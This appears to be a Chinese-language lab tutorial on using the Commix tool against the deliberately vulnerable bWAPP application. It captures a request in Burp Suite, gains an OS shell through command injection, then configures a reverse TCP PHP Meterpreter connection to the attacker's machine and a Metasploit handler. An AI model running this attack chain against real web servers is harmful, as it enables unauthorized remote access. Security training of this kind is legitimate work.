渗透工具实战:使用Commix对Meterpreter进行命令注入攻击

在本文中,我将展示如果严重的操作系统注入漏洞并尝试访问meterpreter shell,您可以轻松地使用commix工具破解Web服务器。
Attaker:kali Linux
目标:bwapp
此处下载并使用VM ware安装和运行它。
作为浏览器中的攻击者浏览器目标IP :192.168.0.105/bwapp,现在使用bee登录:bug作为凭证并从选择您的错误中选择OS命令注入 ; 然后单击的黑客
使用Commix对Meterpreter进行命令注入攻击
这里请求的网页打开,您可以在其中执行任何命令。现在我将启动burp suite来捕获请求。要开始拦截,请单击代理选项卡启用拦截 ; 不要忘记在浏览器中运行代理。现在给像IP的任何命令:192.168.0.105,并单击查找
使用Commix对Meterpreter进行命令注入攻击
在Burp套件中,您将获得已发布的邮件请求。在这里,我们有受害者的详细信息,这将有助于对其Web服务器进行攻击。现在从POST中选择整个数据...... &form = submit然后将其复制保存在文本文件中。我已将其保存为os.txt并进一步将其与commix一起使用。
使用Commix对Meterpreter进行命令注入攻击
之前的教程中,我们使用了手动步骤在commix中执行给定的命令以进行攻击,但这里的步骤更容易和方便申请进行攻击。现在键入以下命令以使commix开始攻击。

commix -r /root/Desktop/os.txt

点击输入按Y作为每个问题的回复。从给定的屏幕截图中你可以看到我有受害者的shell,在这里我执行了以下命令来检索受害者的详细信息。


whoami
id
使用Commix对Meterpreter进行命令注入攻击
现在使用以下步骤启动反向tcp连接。


commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set lhost 192.168.0.104
commix(reverse_tcp) > set lport 8888
选项要求commix为其他反向TCP shell设置连接类型'2'的后门。

commix(reverse_tcp) > 2

选项要求通过commix设置目标类型'5'以使用php meterpreter reverse tcp shell。

commix(reverse_tcp) >5

使用Commix对Meterpreter进行命令注入攻击
复制突出显示的文本并将粘贴到另一个终端上,该终端将加载metasploit框架并在后台自动启动多处理程序。
使用Commix对Meterpreter进行命令注入攻击
一旦metasploit被加载,然后移回到运行commix的前一个终端点击这里输入
使用Commix对Meterpreter进行命令注入攻击
从给定的屏幕截图中你可以看到我有一个meterpreter shell。

meterpreter>sysinfo

使用Commix对Meterpreter进行命令注入攻击
转载请注明本文链接: http://www.mayidui.net/t2331.html
游客
登录后才可以回帖,登录 或者 注册